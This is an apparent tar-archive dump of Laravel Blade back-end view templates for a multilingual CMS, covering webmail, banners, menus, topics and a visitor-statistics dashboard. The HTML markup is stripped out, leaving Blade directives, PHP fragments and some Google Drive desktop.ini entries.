{{Form::open(['route'=>['webmasterSettingsUpdate'],'method'=>'POST'])}}



   
   
   


   
   


   




{!! Form::text('api_key',$WebmasterSetting->api_key, array('id' => 'api_key','readonly'=>'','class' => 'form-control')) !!} {!! trans('backLang.APIKeyGenerate') !!}

{{Form::close()}}

@endsection @section('footerInclude') @endsection views/backEnd/webmaster/banners.blade.php000064400000027343147565226260014460 0ustar00@extends('backEnd.layout') @section('content')

{{ trans('backLang.adsBannersSettings') }}

{{ trans('backLang.home') }} / {{ trans('backLang.webmasterTools') }} / {{ trans('backLang.adsBannersSettings') }}
@if($WebmasterBanners->total() == 0)
{{ trans('backLang.noData') }}
@endif @if($WebmasterBanners->total() > 0) {{Form::open(['route'=>'WebmasterBannersUpdateAll','method'=>'post'])}}
@foreach($WebmasterBanners as $WebmasterBanner) @endforeach
{{ trans('backLang.bannerTitle') }} {{ trans('backLang.sectionType') }} {{ trans('backLang.size') }} {{ trans('backLang.status') }} {{ trans('backLang.options') }}
{!! Form::text('row_no_'.$WebmasterBanner->id,$WebmasterBanner->row_no, array('class' => 'form-control row_no','id'=>'row_no')) !!} {!! trans('backLang.'.$WebmasterBanner->name) !!} {!! ($WebmasterBanner->type==2) ? " ".trans('backLang.sectionTypeVideo')."":"" !!} {!! ($WebmasterBanner->type==1) ? " ".trans('backLang.sectionTypePhoto')."":"" !!} {!! ($WebmasterBanner->type==0) ? " ".trans('backLang.sectionTypeCode')."":"" !!} {{ $WebmasterBanner->width }}* {{ $WebmasterBanner->height }} $WebmasterBanner->id]) }}"> {{ trans('backLang.edit') }}
{{ trans('backLang.showing') }} {{ $WebmasterBanners->firstItem() }} -{{ $WebmasterBanners->lastItem() }} {{ trans('backLang.of') }} {{ $WebmasterBanners->total() }} {{ trans('backLang.records') }}
{!! $WebmasterBanners->links() !!}
{{Form::close()}} @endif
@endsection @section('footerInclude') @endsection views/backEnd/webmaster/desktop.ini000064400000000216147565226260013411 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/backEnd/webmails.blade.php000064400000141405147565226260012636 0ustar00@extends('backEnd.layout') @section('content') @foreach($WebmailsGroups as $WebmailsGroup) @endforeach connect_email != "" && Auth::user()->connect_password) { try { $connectEmailAddress = Auth::user()->connect_email; // Full email address $connectEmailPassword = Auth::user()->connect_password; // Email password $connectDomainURL = substr($connectEmailAddress, strpos($connectEmailAddress, "@") + 1); // Your websites domain $useHTTPS = true; // Depending on how your cpanel is set up, you may be using a secure connection and you may not be. Change this from true to false as needed for your situation /* BEGIN MESSAGE COUNT CODE */ $inbox = imap_open('{' . $connectDomainURL . ':143/notls}INBOX', $connectEmailAddress, $connectEmailPassword) or die(''); $oResult = imap_search($inbox, 'UNSEEN'); if (empty($oResult)) $nMsgCount = 0; else $nMsgCount = count($oResult); imap_close($inbox); } catch (Exception $e) { } } ?>
"create"]) }}" class="btn white">   {!! trans('backLang.compose') !!}
group_id; $cat_id = Session::get('WebmailToEdit')->cat_id; } ?> @if(count($WebmailsGroups)>0)
{!! trans('backLang.labels') !!} :
@endif
@if(Session::has('EditWebmailsGroup')) {{Form::open(['route'=>['webmailsUpdateGroup',Session::get('EditWebmailsGroup')->id],'method'=>'POST'])}}
{!! Form::text('name',Session::get('EditWebmailsGroup')->name, array('placeholder' => trans('backLang.newGroup'),'class' => 'form-control','id'=>'name','required'=>'')) !!}
{{Form::close()}} @else {{Form::open(['route'=>['webmailsStoreGroup'],'method'=>'POST'])}}
{!! Form::text('name','', array('placeholder' => trans('backLang.newGroup'),'class' => 'form-control','id'=>'name','required'=>'')) !!}
{{Form::close()}} @endif

@if( $connectEmailAddress !="" ) {!! trans('backLang.openWebmail') !!} @if($nMsgCount >0 ) {{ $nMsgCount }} @endif @endif
@if($group_id!="create" && !Session::has('WebmailToEdit')) "create"]) }}" class="md-btn md-fab md-fab-bottom-right pos-fix red"> @endif
@if(Session::has('doneMessage2'))
{{ Session::get('doneMessage2') }}
@endif @if(Session::has('WebmailToEdit')) @if($group_id=="draft" || $cat_id ==2)

{{ trans('backLang.compose') }}

{{Form::open(['route'=>['webmailsUpdate',"id"=>Session::get('WebmailToEdit')->id],'method'=>'POST', 'files' => true])}} $siteTitle_var != "") { $siteTitle = $SiteSetting->$siteTitle_var; } else { $siteTitle = $SiteSetting->$siteTitle_var2; } try { $from_email = Session::get('WebmailToEdit')->from_email; $msg_title = Session::get('WebmailToEdit')->title; $msg_details = Session::get('WebmailToEdit')->details; $to_cc = Session::get('WebmailToEdit')->to_cc; $to_bcc = Session::get('WebmailToEdit')->to_bcc; } catch (Exception $e) { $from_email = ""; $msg_title = ""; $msg_details = ""; $to_cc = ""; $to_bcc = ""; } ?> {!! Form::hidden('contact_id','') !!} {!! Form::hidden('father_id','') !!} {!! Form::hidden('from_email',$SiteSetting->site_webmails) !!} {!! Form::hidden('from_name',$siteTitle) !!} {!! Form::hidden('from_phone','') !!} {!! Form::hidden('to_name','') !!}
{!! Form::email('to_email',$from_email, array('placeholder' => '','class' => 'form-control','id'=>'to_email','required'=>'')) !!}
{!! Form::email('to_cc',$to_cc, array('placeholder' => '','class' => 'form-control','id'=>'to_cc')) !!}
×
{!! Form::email('to_bcc',$to_bcc, array('placeholder' => '','class' => 'form-control','id'=>'to_bcc')) !!}
×
{!! Form::text('title',$msg_title, array('placeholder' => '','class' => 'form-control','id'=>'title','required'=>'')) !!}
{!! Form::textarea('details',$msg_details, array('ui-jp'=>'summernote','placeholder' => '','class' => 'form-control','ui-options'=>'{height: 250}')) !!}
{!! Form::file('attach_files[]', array('class' => 'form-control','id'=>'attach_files','multiple'=>'')) !!}
{!! Form::hidden('btn_clicked','', array('id'=>'btn_clicked')) !!} {!! trans('backLang.cancel') !!}
{{Form::close()}}
@else
{!! trans('backLang.sendFrom') !!}:   {!! Session::get('WebmailToEdit')->from_name !!}

@if(Session::get('WebmailToEdit')->from_phone !="") {!! trans('backLang.contactPhone') !!}:   {!! Session::get('WebmailToEdit')->from_phone !!}
@endif @if(Session::get('WebmailToEdit')->from_email !="") {!! trans('backLang.contactEmail') !!}:   {!! Session::get('WebmailToEdit')->from_email !!} @endif

{!! trans('backLang.sendTo') !!}:   {!! Session::get('WebmailToEdit')->to_name !!}

@if(Session::get('WebmailToEdit')->to_email !="") {!! trans('backLang.contactEmail') !!}:   {!! Session::get('WebmailToEdit')->to_email !!}
@endif @if(Session::get('WebmailToEdit')->to_cc !="") {!! trans('backLang.sendCc') !!}:   {!! Session::get('WebmailToEdit')->to_cc !!}
@endif @if(Session::get('WebmailToEdit')->to_bcc !="") {!! trans('backLang.sendBcc') !!}:   {!! Session::get('WebmailToEdit')->to_bcc !!} @endif

date)); ?>

{!! Session::get('WebmailToEdit')->title !!}

{{$dtformated}} @if(Session::get('WebmailToEdit')->details)

{!! nl2br(Session::get('WebmailToEdit')->details) !!}

@endif
@if(count(Session::get('WebmailToEdit')->files) > 0)
{{ trans('backLang.AttachFiles') }}

@foreach(Session::get('WebmailToEdit')->files as $file)
file, "."); $ext = strtolower($ext); if(!in_array($ext, $img_type)) { ?> {!! $file->file !!}
@endforeach
@endif @endif @elseif($group_id=="create")

{{ trans('backLang.compose') }}

{{Form::open(['route'=>['webmailsStore'],'method'=>'POST', 'files' => true ])}} $siteTitle_var != "") { $siteTitle = $SiteSetting->$siteTitle_var; } else { $siteTitle = $SiteSetting->$siteTitle_var2; } try { $from_email = $WebmailToreply->from_email; $msg_title = $WebmailToreply->title; $msg_details = $WebmailToreply->details; } catch (Exception $e) { $from_email = $contact_email; $msg_title = ""; $msg_details = ""; } if ($stat == "replay") { $msg_title = "Re: " . $msg_title; $msg_details = "

" . $msg_details . ""; } if ($stat == "forward") { $from_email = ""; $msg_title = "Forward: " . $msg_title; } ?> {!! Form::hidden('contact_id','') !!} {!! Form::hidden('father_id','') !!} {!! Form::hidden('from_email',$SiteSetting->site_webmails) !!} {!! Form::hidden('from_name',$siteTitle) !!} {!! Form::hidden('from_phone','') !!} {!! Form::hidden('to_name','') !!}
{!! Form::email('to_email',$from_email, array('placeholder' => '','class' => 'form-control','id'=>'to_email','required'=>'')) !!}
{!! Form::text('title',$msg_title, array('placeholder' => '','class' => 'form-control','id'=>'title','required'=>'')) !!}
{!! Form::textarea('details',$msg_details, array('ui-jp'=>'summernote','placeholder' => '','class' => 'form-control','ui-options'=>'{height: 250}')) !!}
{!! Form::file('attach_files[]', array('class' => 'form-control','id'=>'attach_files','multiple'=>'')) !!}
{!! Form::hidden('btn_clicked','', array('id'=>'btn_clicked')) !!} {!! trans('backLang.cancel') !!}
{{Form::close()}}
@else @if($Webmails->total() == 0)
{{ trans('backLang.noData') }}
@endif @if($Webmails->total() > 0)
{{Form::open(['route'=>['webmailsSearch'],'method'=>'POST'])}}
{!! Form::text('q',$search_word, array('placeholder' => trans('backLang.search')."...",'class' => 'form-control','id'=>'name','required'=>'')) !!}
{{Form::close()}}
      
{{Form::open(['route'=>'webmailsUpdateAll','method'=>'post','id'=>'UpdateAll'])}}
@foreach($Webmails as $Webmail) date)); if ($day_mm == $s4ds_current_date) { $dtformated = date('h:i A', strtotime($Webmail->date)); } else { $dtformated = date('d M Y', strtotime($Webmail->date)); } try { $groupColor = $Webmail->webmailsGroup->color; $groupName = $Webmail->webmailsGroup->name; } catch (Exception $e) { $groupColor = ""; $groupName = ""; } $fontStyle = ""; $unreadIcon = ""; $unreadbg = ""; $unreadText = ""; if ($Webmail->status == 0) { $fontStyle = "_700"; $unreadIcon = ""; $unreadbg = "style=\"background: $groupColor \""; $unreadText = "style=\"color: $groupColor \""; } ?> @endforeach {!! $Webmails->links() !!}
{{Form::close()}} @endif @endif
@endsection @section('footerInclude') @endsection views/backEnd/menus/edit.blade.php000064400000025126147565226260013110 0ustar00@extends('backEnd.layout') @section('content')
{{Form::open(['route'=>['menusUpdate',$Menus->id],'method'=>'POST', 'files' => true])}} {!! Form::hidden('ParentMenuId',$ParentMenuId) !!}
@if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::text('title_ar',$Menus->title_ar, array('placeholder' => '','class' => 'form-control','id'=>'title_ar','required'=>'', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::text('title_he',$Menus->title_he, array('placeholder' => '','class' => 'form-control','id'=>'title_he','required'=>'', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::text('title_en',$Menus->title_en, array('placeholder' => '','class' => 'form-control','id'=>'title_en','required'=>'', 'dir'=>trans('backLang.ltr'))) !!}
@endif
           
   
{{Form::close()}}
@endsection views/backEnd/menus/create.blade.php000064400000022143147565226260013422 0ustar00@extends('backEnd.layout') @section('content')
{{Form::open(['route'=>['menusStore',$ParentMenuId],'method'=>'POST', 'files' => true ])}} {!! Form::hidden('ParentMenuId',$ParentMenuId) !!}
@if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::text('title_ar','', array('placeholder' => '','class' => 'form-control','id'=>'title_ar','required'=>'', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::text('title_he','', array('placeholder' => '','class' => 'form-control','id'=>'title_he','required'=>'', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::text('title_en','', array('placeholder' => '','class' => 'form-control','id'=>'title_en','required'=>'', 'dir'=>trans('backLang.ltr'))) !!}
@endif
           
{{Form::close()}}
@endsection views/backEnd/menus/desktop.ini000064400000000216147565226260012547 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/backEnd/topics.blade.php000064400000042742147565226260012340 0ustar00@extends('backEnd.layout') @section('content')

{!! trans('backLang.'.$WebmasterSection->name) !!}

{{ trans('backLang.home') }} / {!! trans('backLang.'.$WebmasterSection->name) !!}
@if($Topics->total() >0) @if(@Auth::user()->permissionsGroup->add_status) @endif @endif @if($Topics->total() == 0)
{{ trans('backLang.noData') }}

@if(@Auth::user()->permissionsGroup->add_status) id)}}">   {{ trans('backLang.topicNew') }} {!! trans('backLang.'.$WebmasterSection->name) !!} @endif
@endif @if($Topics->total() > 0) {{Form::open(['route'=>['topicsUpdateAll',$WebmasterSection->id],'method'=>'post'])}}
@if($WebmasterSection->date_status) @endif @if($WebmasterSection->expire_date_status) @endif @foreach($Topics as $Topic) $title_var != "") { $title = $Topic->$title_var; } else { $title = $Topic->$title_var2; } // Get Categories list $section = ""; $sectionSt = ""; if ($WebmasterSection->sections_status != 0) { foreach ($Topic->categories as $category) { try { if ($category->section->$title_var != "") { $cat_title = $category->section->$title_var; } else { $cat_title = $category->section->$title_var2; } $section .= $cat_title . ", "; } catch (Exception $e) { } } if ($section == "") { $sectionSt = "" . trans('backLang.topicDeletedSection') . ""; } else { $section = rtrim($section, ", "); } } ?> @if($WebmasterSection->date_status) @endif @if($WebmasterSection->expire_date_status) @endif @endforeach
{{ trans('backLang.topicName') }}{{ trans('backLang.topicDate') }}{{ trans('backLang.expireDate') }}{{ trans('backLang.visits') }} {{ trans('backLang.status') }} {{ trans('backLang.options') }}
@if($Topic->photo_file !="")
{{ $title }}
@endif {!! Form::text('row_no_'.$Topic->id,$Topic->row_no, array('class' => 'pull-left form-control row_no','id'=>'row_no')) !!} @if($Topic->icon !="") @endif {{ $title }}
{{ $section }} {!! $sectionSt !!}
{!! $Topic->date !!} expire_date < date("Y-m-d"))? "style='color:red'":"" !!}>{!! $Topic->expire_date !!} {!! $Topic->visits !!} @if($WebmasterSection->comments_status) @if(count($Topic->newComments) >0) @elseif(count($Topic->comments) >0) @endif @endif @if(@Auth::user()->permissionsGroup->edit_status) $WebmasterSection->id,"id"=>$Topic->id]) }}"> {{ trans('backLang.edit') }} @endif @if(@Auth::user()->permissionsGroup->delete_status) @endif
{{ trans('backLang.showing') }} {{ $Topics->firstItem() }} -{{ $Topics->lastItem() }} {{ trans('backLang.of') }} {{ $Topics->total() }} {{ trans('backLang.records') }}
{!! $Topics->links() !!}
{{Form::close()}} @endif
@endsection @section('footerInclude') @endsection views/backEnd/banners.blade.php000064400000032054147565226260012462 0ustar00@extends('backEnd.layout') @section('content')
@if($Banners->total() >0) @if(@Auth::user()->permissionsGroup->add_status)
@foreach($WebmasterBanners as $WebmasterBanner) id)}}">   {!! trans('backLang.'.$WebmasterBanner->name) !!} @endforeach
@endif @endif @if($Banners->total() == 0)
{{ trans('backLang.noData') }}

@if(@Auth::user()->permissionsGroup->add_status) @foreach($WebmasterBanners as $WebmasterBanner) id)}}">   {!! trans('backLang.'.$WebmasterBanner->name) !!} @endforeach @endif
@endif @if($Banners->total() > 0) {{Form::open(['route'=>'BannersUpdateAll','method'=>'post'])}}
@foreach($Banners as $Banner) $title_var != "") { $title = $Banner->$title_var; } else { $title = $Banner->$title_var2; } ?> @endforeach
{{ trans('backLang.sectionName') }} {{ trans('backLang.bannerSection') }} {{ trans('backLang.status') }} {{ trans('backLang.options') }}
{!! Form::text('row_no_'.$Banner->id,$Banner->row_no, array('class' => 'form-control row_no','id'=>'row_no')) !!} @if($Banner->icon !="") @endif {!! $title !!} {!! trans('backLang.'.$Banner->webmasterBanner->name) !!} @if(@Auth::user()->permissionsGroup->edit_status) $Banner->id]) }}"> {{ trans('backLang.edit') }} @endif @if(@Auth::user()->permissionsGroup->delete_status) @endif
{{ trans('backLang.showing') }} {{ $Banners->firstItem() }} -{{ $Banners->lastItem() }} {{ trans('backLang.of') }} {{ $Banners->total() }} {{ trans('backLang.records') }}
{!! $Banners->links() !!}
{{Form::close()}} @endif
@endsection @section('footerInclude') @endsection views/backEnd/includes/foot.blade.php000064400000000703147565226260013603 0ustar00 {!! Helper::SaveVisitorInfo("http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]") !!}views/backEnd/includes/footer.blade.php000064400000000650147565226260014133 0ustar00views/backEnd/includes/menu.blade.php000064400000065634147565226260013616 0ustar00 views/backEnd/includes/settings.blade.php000064400000007020147565226260014473 0ustar00

{{ trans('backLang.themeSwitcher') }}

{{ trans('backLang.themes') }}:


@if(Helper::GeneralWebmasterSettings("ar_box_status") || Helper::GeneralWebmasterSettings("en_box_status")|| Helper::GeneralWebmasterSettings("he_box_status"))

{{ trans('backLang.language') }}:

{{Form::open(['route'=>'lang','method'=>'post'])}}
{!! Form::submit(trans('backLang.change'), array('class' => 'btn btn-success btn-sm')) !!}
{{Form::close()}} @endif
views/backEnd/includes/header.blade.php000064400000031576147565226260014100 0ustar00connect_email != "" && Auth::user()->connect_password) { try { $connectEmailAddress = Auth::user()->connect_email; // Full email address $connectEmailPassword = Auth::user()->connect_password; // Email password $connectDomainURL = substr($connectEmailAddress, strpos($connectEmailAddress, "@") + 1); $useHTTPS = true; } catch (Exception $e) { } } ?> views/backEnd/includes/errors.blade.php000064400000005105147565226260014151 0ustar00@if($errors ->any())
    @foreach($errors->all() as $error)
  • {{ $error }}
  • @endforeach
@endif @if(Session::has('doneMessage'))
{{ Session::get('doneMessage') }}
@endif @if(Session::has('errorMessage'))
{{ Session::get('errorMessage') }}
@endif @if(Session::has('infoMessage'))
{{ Session::get('infoMessage') }}
@endif @if(Session::has('warningMessage'))
{{ Session::get('warningMessage') }}
@endif views/backEnd/includes/desktop.ini000064400000000216147565226260013226 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/backEnd/includes/head.blade.php000064400000003655147565226260013546 0ustar00 {{ trans('backLang.control') }} | {{ Helper::GeneralSiteSettings("site_title_" . trans('backLang.boxCode')) }} @if( trans('backLang.direction')=="rtl") @endif views/backEnd/emails/webmail.blade.php000064400000020122147565226260013715 0ustar00 Notification 8 - Responsive Email Template
 
 
{!! $title !!}
 
{!! $details !!}
 
 
 
 
 
views/backEnd/emails/desktop.ini000064400000000216147565226260012672 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/backEnd/home.blade.php000064400000100514147565226260011757 0ustar00@extends('backEnd.layout') @section('headerInclude') @endsection @section('content')
{{ trans('backLang.hi') }} {{ Auth::user()->name }}, {{ trans('backLang.welcomeBack') }}
permissionsGroup->data_sections); $clr_ary = array("info", "danger", "success", "accent",); $ik = 0; ?> @foreach($GeneralWebmasterSections as $headerWebmasterSection) @if(in_array($headerWebmasterSection->id,$data_sections_arr)) @if($ik<4) type == 3) { $LiIcon = ""; } if ($headerWebmasterSection->type == 2) { $LiIcon = ""; } if ($headerWebmasterSection->type == 1) { $LiIcon = ""; } if ($headerWebmasterSection->type == 0) { $LiIcon = ""; } if ($headerWebmasterSection->name == "sitePages") { $LiIcon = ""; } if ($headerWebmasterSection->name == "articles") { $LiIcon = ""; } if ($headerWebmasterSection->name == "services") { $LiIcon = ""; } if ($headerWebmasterSection->name == "news") { $LiIcon = ""; } if ($headerWebmasterSection->name == "products") { $LiIcon = ""; } ?> @endif @endif @endforeach
{{ trans('backLang.visitors') }}

{{$TodayVisitors}}

{{ trans('backLang.pageViews') }}

{{$TodayPages}}

{{ trans('backLang.visitorsRate') }}

{{ trans('backLang.visitorsRateToday')." [ ".date('Y-m-d')." ]" }}

{{ trans('backLang.browsers') }}

{{ trans('backLang.browsersCalculated') }}
@if($TodayByBrowser1_val >0)
{{$TodayByBrowser1}} {{$TodayByBrowser1_val}} {{ trans('backLang.more') }}
{{$TodayByBrowser2}} {{$TodayByBrowser2_val}} {{ trans('backLang.more') }}
@endif

{{ trans('backLang.todayByCountry') }}

@if(count($TodayByCountry) == 0)

{{ trans('backLang.noData') }}
@else
    @foreach($TodayByCountry as $id) @if($ii<=4)
  • @foreach($id as $key => $val) @if($i2 == 0) @endif @if($i2 == 1) @endif @if($i2 == 2) @endif @if($i2 == 3) @endif @endforeach
"; } ?> {{$v1}}
{!! $flag !!} {{$v0}}
{{ trans('backLang.visitors') }} : {{ $v2 }}, {{ trans('backLang.pageViews') }} : {{ $v3 }}
@endif @endforeach @endif
permissionsGroup->inbox_status) { $col_count++; } } if (Helper::GeneralWebmasterSettings("calendar_status")) { if (Auth::user()->permissionsGroup->calendar_status) { $col_count++; } } if (Helper::GeneralWebmasterSettings("newsletter_status")) { if (Auth::user()->permissionsGroup->newsletter_status) { $col_count++; } } $col_width = 12; if ($col_count > 0) { $col_width = 12 / $col_count; } ?> @if(Helper::GeneralWebmasterSettings("inbox_status")) @if(@Auth::user()->permissionsGroup->inbox_status)

{{ trans('backLang.latestMessages') }}

@if(count($Webmails) == 0)

{{ trans('backLang.noData') }}
@else
    @foreach($Webmails as $Webmail) date)); if ($day_mm == $s4ds_current_date) { $dtformated = date('h:i A', strtotime($Webmail->date)); } else { $dtformated = date('d M Y', strtotime($Webmail->date)); } try { $groupColor = $Webmail->webmailsGroup->color; $groupName = $Webmail->webmailsGroup->name; } catch (Exception $e) { $groupColor = ""; $groupName = ""; } $fontStyle = ""; $unreadIcon = ""; $unreadbg = ""; $unreadText = ""; if ($Webmail->status == 0) { $fontStyle = "_700"; $unreadIcon = ""; $unreadbg = "style=\"background: $groupColor \""; $unreadText = "style=\"color: $groupColor \""; } ?>
  • {{ $dtformated }}
    $Webmail->id]) }}" class="pull-left w-40 m-r"> {!! $unreadIcon !!}
  • @endforeach
@endif
@endif @endif @if(Helper::GeneralWebmasterSettings("calendar_status")) @if(@Auth::user()->permissionsGroup->calendar_status)

{{ trans('backLang.notesEvents') }}

@if(count($Events) == 0)

{{ trans('backLang.noData') }}
@else
@foreach($Events as $Event) type == 3) { $cls = "info"; } elseif ($Event->type == 2) { $cls = "danger"; } elseif ($Event->type == 1) { $cls = "success"; } else { $cls = "black"; } ?>
@if($Event->type ==1 || $Event->type ==2) {{ date('Y-m-d H:i:s', strtotime($Event->start_date)) }} @else {{ date('Y-m-d', strtotime($Event->start_date)) }} @endif
@endforeach
@endif
@endif @endif @if(Helper::GeneralWebmasterSettings("newsletter_status")) @if(@Auth::user()->permissionsGroup->newsletter_status)

{{ trans('backLang.latestContacts') }}

@if(count($Contacts) == 0)

{{ trans('backLang.noData') }}
@else @endif
@endif @endif
@endsection views/backEnd/topics/edit.blade.php000064400000704417147565226260013271 0ustar00@extends('backEnd.layout') @section('headerInclude') @endsection @section('content')

{{ trans('backLang.topicEdit') }} {!! trans('backLang.'.$WebmasterSection->name) !!}

{{ trans('backLang.home') }} / {!! trans('backLang.'.$WebmasterSection->name) !!}
@endsection @section('footerInclude') @if($WebmasterSection->maps_status) @endif @endsectionviews/backEnd/topics/create.blade.php000064400000126624147565226270013606 0ustar00@extends('backEnd.layout') @section('headerInclude') @endsection @section('content')

{{ trans('backLang.topicNew') }} {!! trans('backLang.'.$WebmasterSection->name) !!}

{{ trans('backLang.home') }} / {!! trans('backLang.'.$WebmasterSection->name) !!}
{{Form::open(['route'=>['topicsStore',$WebmasterSection->id],'method'=>'POST', 'files' => true ])}} @if($WebmasterSection->date_status)
{!! Form::text('date',date("Y-m-d"), array('placeholder' => '','class' => 'form-control','id'=>'date','required'=>'')) !!}
@else {!! Form::hidden('date',date("Y-m-d"), array('placeholder' => '','class' => 'form-control','id'=>'date')) !!} @endif @if($WebmasterSection->expire_date_status)
{!! Form::text('expire_date','', array('placeholder' => '','class' => 'form-control','id'=>'expire_date')) !!}
@endif @if($WebmasterSection->sections_status!=0)
@else {!! Form::hidden('section_id','0') !!} @endif @if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::text('title_ar','', array('placeholder' => '','class' => 'form-control','id'=>'title_ar','required'=>'', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::text('title_he','', array('placeholder' => '','class' => 'form-control','id'=>'title_he','required'=>'', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::text('title_en','', array('placeholder' => '','class' => 'form-control','id'=>'title_en','required'=>'', 'dir'=>trans('backLang.ltr'))) !!}
@endif @if($WebmasterSection->longtext_status) @if($WebmasterSection->editor_status) @if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::textarea('details_ar','

', array('ui-jp'=>'summernote','placeholder' => '','class' => 'form-control summernote', 'dir'=>trans('backLang.rtl'),'ui-options'=>'{height: 300}')) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::textarea('details_he','

', array('ui-jp'=>'summernote','placeholder' => '','class' => 'form-control summernote', 'dir'=>trans('backLang.rtl'),'ui-options'=>'{height: 300}')) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::textarea('details_en','

', array('ui-jp'=>'summernote','placeholder' => '','class' => 'form-control', 'dir'=>trans('backLang.ltr'),'ui-options'=>'{height: 300}')) !!}
@endif @else @if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::textarea('details_ar','', array('placeholder' => '','class' => 'form-control', 'dir'=>trans('backLang.rtl'),'rows'=>'5')) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::textarea('details_he','', array('placeholder' => '','class' => 'form-control', 'dir'=>trans('backLang.rtl'),'rows'=>'5')) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::textarea('details_en','', array('placeholder' => '','class' => 'form-control', 'dir'=>trans('backLang.ltr'),'rows'=>'5')) !!}
@endif @endif @endif @if($WebmasterSection->type==2)
           
{!! Form::file('video_file', array('class' => 'form-control','id'=>'video_file','accept'=>'*')) !!}
{!! trans('backLang.videoTypes') !!}
@endif @if($WebmasterSection->type==3)
{!! Form::file('audio_file', array('class' => 'form-control','id'=>'audio_file','accept'=>'audio/*')) !!}
{!! trans('backLang.audioTypes') !!}
@endif
{!! Form::file('photo_file', array('class' => 'form-control','id'=>'photo_file','accept'=>'image/*')) !!}
{!! trans('backLang.imagesTypes') !!}
@if($WebmasterSection->icon_status)
{!! Form::text('icon','', array('placeholder' => '','class' => 'form-control icp icp-auto','id'=>'icon', 'data-placement'=>'bottomRight')) !!}
@endif @if($WebmasterSection->attach_file_status)
{!! Form::file('attach_file', array('class' => 'form-control','id'=>'attach_file')) !!}
{!! trans('backLang.attachTypes') !!}
@endif {{--Additional Feilds--}} @if(count($WebmasterSection->customFields) >0) @foreach($WebmasterSection->customFields as $customField) $cf_title_var != "") { $cf_title = $customField->$cf_title_var; } else { $cf_title = $customField->$cf_title_var2; } // check field language status $cf_land_identifier = ""; $cf_land_active = false; $cf_land_dir = trans('backLang.direction'); if (Helper::GeneralWebmasterSettings("ar_box_status") && Helper::GeneralWebmasterSettings("he_box_status")) { if ($customField->lang_code == "ar") { $cf_land_identifier = trans('backLang.arabicBox'); } elseif ($customField->lang_code == "en") { $cf_land_identifier = trans('backLang.englishBox'); } elseif ($customField->lang_code == "he") { $cf_land_identifier = trans('backLang.hebrewBox'); } } if (Helper::GeneralWebmasterSettings("ar_box_status") && $customField->lang_code == "ar") { $cf_land_active = true; $cf_land_dir = "rtl"; } if (Helper::GeneralWebmasterSettings("he_box_status") && $customField->lang_code == "he") { $cf_land_active = true; $cf_land_dir = "rtl"; } if (Helper::GeneralWebmasterSettings("en_box_status") && $customField->lang_code == "en") { $cf_land_active = true; $cf_land_dir = "ltr"; } if ($customField->lang_code == "all") { $cf_land_active = true; } // required Status $cf_required = ""; if ($customField->required) { $cf_required = "required"; } ?> @if($cf_land_active) @if($customField->type ==12) {{--Vimeo Video Link--}}
{!! Form::text('customField_'.$customField->id,$customField->default_value, array('placeholder' => '','class' => 'form-control','id'=>'customField_'.$customField->id,$cf_required=>'', 'dir'=>'ltr')) !!}
@elseif($customField->type ==11) {{--Youtube Video Link--}}
{!! Form::text('customField_'.$customField->id,$customField->default_value, array('placeholder' => '','class' => 'form-control','id'=>'customField_'.$customField->id,$cf_required=>'', 'dir'=>'ltr')) !!}
@elseif($customField->type ==10) {{--Video File--}}
{!! Form::file('customField_'.$customField->id, array('class' => 'form-control','id'=>'customField_'.$customField->id,$cf_required=>'','accept'=>'*')) !!}
@elseif($customField->type ==9) {{--Attach File--}}
{!! Form::file('customField_'.$customField->id, array('class' => 'form-control','id'=>'customField_'.$customField->id,$cf_required=>'','accept'=>'*')) !!}
@elseif($customField->type ==8) {{--Photo File--}}
{!! Form::file('customField_'.$customField->id, array('class' => 'form-control','id'=>'customField_'.$customField->id,$cf_required=>'','accept'=>'image/*')) !!}
@elseif($customField->type ==7) {{--Multi Check--}}
@elseif($customField->type ==6) {{--Select--}}
@elseif($customField->type ==5) {{--Date & Time--}}
{!! Form::text('customField_'.$customField->id,$customField->default_value, array('placeholder' => '','class' => 'form-control','id'=>'customField_'.$customField->id,$cf_required=>'', 'dir'=>$cf_land_dir)) !!}
@elseif($customField->type ==4) {{--Date--}}
{!! Form::text('customField_'.$customField->id,$customField->default_value, array('placeholder' => '','class' => 'form-control','id'=>'customField_'.$customField->id,$cf_required=>'', 'dir'=>$cf_land_dir)) !!}
@elseif($customField->type ==3) {{--Email Address--}}
{!! Form::email('customField_'.$customField->id,$customField->default_value, array('placeholder' => '','class' => 'form-control','id'=>'customField_'.$customField->id,$cf_required=>'', 'dir'=>$cf_land_dir)) !!}
@elseif($customField->type ==2) {{--Number--}}
{!! Form::number('customField_'.$customField->id,$customField->default_value, array('placeholder' => '','class' => 'form-control','id'=>'customField_'.$customField->id,$cf_required=>'','min'=>0, 'dir'=>$cf_land_dir)) !!}
@elseif($customField->type ==1) {{--Text Area--}}
